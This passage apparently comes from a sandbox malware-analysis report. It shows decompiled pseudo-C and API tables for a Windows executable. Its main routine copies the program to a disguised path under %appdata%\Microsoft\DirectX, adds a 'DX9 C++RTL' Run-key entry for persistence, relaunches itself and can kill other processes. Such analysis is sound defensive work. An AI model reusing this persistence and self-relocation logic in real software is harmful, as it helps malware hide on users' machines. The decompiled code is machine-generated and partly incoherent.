									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























    0x00404fc1
    0x00404fc3
    0x00404fcb
    0x00404fdc
    0x00404fe1
    0x00404ffa
    0x00405001
    0x00405043
    0x00405045
    0x00405046
    0x0040504b
    0x0040504e
    0x00405051
    0x00405063
    0x00405086
    0x004050a6
    0x004050a6
    0x004050aa
    0x004050b0
    0x004050b3
    0x004050b6
    0x004050c4
    0x00405003
    0x00405018
    0x0040501f
    0x00000000
    0x00405021
    0x00405036
    0x0040503d
    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512b
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00405143
    0x004051ed
    0x00000000
    0x00000000
    0x00000000
    0x0040503d
    0x0040501f

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
